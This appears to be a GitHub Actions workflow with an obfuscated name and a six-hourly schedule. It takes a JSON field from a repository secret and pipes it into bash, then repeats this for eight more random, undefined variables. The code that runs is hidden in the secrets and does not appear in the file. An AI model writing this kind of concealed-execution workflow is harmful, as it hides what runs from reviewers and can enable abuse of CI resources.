name: laojiangzhongzheng
on:
  workflow_dispatch:
  schedule:
    - cron: '17 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: laojiangzhongzheng
        env:
          isbpb02: ${{ secrets.isbpb02 }}
        run: |
          echo $isbpb02 | jq -r .ddgt90 | /bin/bash
          echo $sobo5504 | jq -r .d5084 | /bin/bash
          echo $o56 | jq -r .o8 | /bin/bash
          echo $nj15618 | jq -r .vqiv5489 | /bin/bash
          echo $lk504 | jq -r .nryd5 | /bin/bash
          echo $eovcn66 | jq -r .mln3653 | /bin/bash
          echo $f80 | jq -r .thr5273 | /bin/bash
          echo $mtm42 | jq -r .rcbyr1980 | /bin/bash
          echo $mapz1 | jq -r .tzt61 | /bin/bash

